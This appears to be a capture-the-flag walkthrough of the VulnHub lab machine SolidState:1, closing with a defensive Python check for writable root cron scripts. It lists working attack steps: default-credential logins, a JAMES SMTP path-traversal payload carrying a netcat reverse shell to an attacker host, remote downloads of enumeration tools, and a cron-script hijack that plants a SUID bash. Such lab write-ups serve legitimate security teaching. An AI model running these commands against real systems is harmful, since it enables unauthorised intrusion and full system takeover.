VulnHub: SOLIDSTATE: 1

ratiros01
6 min read · Mar 23, 2021

Link: https://www.vulnhub.com/entry/solidstate-1,261/

1. Network Discovery

2. Port scan

nmap -Pn 10.0.2.25
nmap -Pn -p1000- 10.0.2.25

3. OS and service scan

nmap -A -p22,25,80,110,119,4555 10.0.2.25

4. Vuln scan

nmap --script vuln -p22,25,80,110,119,4555 10.0.2.25

5. Starting w/ port 80

Nikto

nikto -h http://10.0.2.25

Directory scan

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.25/ -x php,txt,html,sh,cgi -q

Access the site

View page source, nothing

services.html

Tried XSS, but nothing happened.

Maybe these are usernames?

6. Next is port 25: JAMES smtpd 2.3.2.

I came across this guide

telnet 10.0.2.25 4555
Username: root
Password: root
HELP
listusers

I changed all the passwords

setpassword <username> 1234

Access these accounts via the POP3 service on port 110 using Thunderbird

John: there’s a message

Mindy: there are 2 messages.

I have mindy’s username and password to log in via SSH.

7. Login w/ mindy’s credentials

ssh mindy@10.0.2.25
ls -la
cat user.txt

Try exploring system

cd ..

Restricted

Read passwd

cat /etc/passwd

I’m restricted by rbash and cannot do anything

8. James 2.3.2: Get back to the exploitation guide

Follow the guide

adduser ../../../../../../../../etc/bash_completion.d password

I have to supply the reverse shell command

Prepare listener on port 443

rlwrap nc -lvp 443

Connect to port 25

telnet 10.0.2.25 25

Following the guide and using reverse shell cheatsheet

EHLO bla.bla
MAIL FROM: <'you@domain.com>
RCPT TO: <../../../../../../../../etc/bash_completion.d>
DATA
From: bla.bla'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.2.27 443 >/tmp/f
.

Log in as mindy again; you will see some weird stuff.

ssh mindy@10.0.2.25

Back to listener, now I have a shell

whoami

9. Privilege escalation

I need TTY shell.

python -c 'import pty;pty.spawn("/bin/bash");'

I want to run LinEnum.sh

Prepare SimpleHTTPServer on attacker machine

python -m SimpleHTTPServer 80

Download the script

cd /tmp
wget http://10.0.2.27/LinEnum.sh

Change permissions and run

chmod 777 LinEnum.sh
/tmp/LinEnum.sh -t

The machine is 32-bit.

There’s /opt/tmp.py -> very interesting

Cannot do anything with these files

Nothing on SUID/SGID

Nothing on cron

Verify sudo

sudo -l

No command

Verify capabilities

getcap -r / 2>/dev/null

Let’s check which services are running besides the cron job

ps aux | grep "^root"

I found ‘cron -f’. There must be something running in the background.

Observe system w/ pspy

This machine is 32-bit. I will download pspy32 to the machine.

wget http://10.0.2.27/pspy32
chmod 777 pspy32
/tmp/pspy32

After observing for a while I got this. It’s ‘/opt/tmp.py’ again.

Read the file.

cd /opt
cat tmp.py

I can append this command to the script to get a root shell.

echo 'os.system("cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash")' >> tmp.py
cat tmp.py

Wait for a while

cd /tmp
ls -la

Now I got /tmp/rootbash

Run it

/tmp/rootbash -p
whoami

Now I’m root

Get root.txt

cd /root
ls -la
cat root.txt
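The escalation above works because a script that root’s cron executes is writable by a low-privilege user. As a defender-side check, here is an added example (not part of this write-up) that parses /etc/crontab-style entries and flags root-run scripts that another user could modify or replace. The crontab text, the scratch directory tree and the `privileged_uid` parameter are constructed for the demo.

```python
import os
import stat
import tempfile

def parse_system_crontab(text):
    """Yield (user, script) from /etc/crontab-style lines: five schedule
    fields, the user, then the command (first token taken as the script)."""
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 7 or fields[0].startswith("#") or "=" in fields[0]:
            continue
        yield fields[5], fields[6]

def writable_by_unprivileged(path, privileged_uid=0):
    """True if someone other than the privileged owner could change or replace
    the file: other owner, group/world write bit, or a group/world-writable
    parent directory without the sticky bit."""
    st = os.stat(path)
    if st.st_uid != privileged_uid or st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return True
    parent = os.stat(os.path.dirname(path) or ".")
    loose = parent.st_mode & (stat.S_IWGRP | stat.S_IWOTH)
    return bool(loose) and not parent.st_mode & stat.S_ISVTX

def audit(crontab_text, root="", privileged_uid=0):
    """Scripts root runs from cron that an unprivileged user could edit.
    `root` lets the demo point at a scratch tree instead of the real '/'."""
    findings = []
    for user, script in parse_system_crontab(crontab_text):
        path = root + script
        if user == "root" and os.path.exists(path) \
                and writable_by_unprivileged(path, privileged_uid):
            findings.append(script)
    return findings

def demo():
    """Constructed scratch tree: a 777 /opt/tmp.py (the target's weakness) next
    to a locked-down 755 /opt/safe.py, audited against a sample crontab."""
    base = tempfile.mkdtemp()
    os.makedirs(base + "/opt")
    os.chmod(base + "/opt", 0o755)
    for name, mode in (("tmp.py", 0o777), ("safe.py", 0o755)):
        with open(f"{base}/opt/{name}", "w") as fh:
            fh.write("#!/usr/bin/env python\nimport os\n")
        os.chmod(f"{base}/opt/{name}", mode)
    crontab = ("SHELL=/bin/sh\n"
               "# constructed sample, not the target's real crontab\n"
               "*/3 * * * * root /opt/tmp.py\n"
               "*/3 * * * * root /opt/safe.py\n"
               "*/3 * * * * mindy /opt/tmp.py\n")
    # Our own uid plays the "privileged" owner so the scratch files qualify.
    return audit(crontab, root=base, privileged_uid=os.getuid())
```

Only /opt/tmp.py is reported: safe.py has the same root cron entry but no group/world write bit, and the mindy entry is ignored because it does not run as root.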
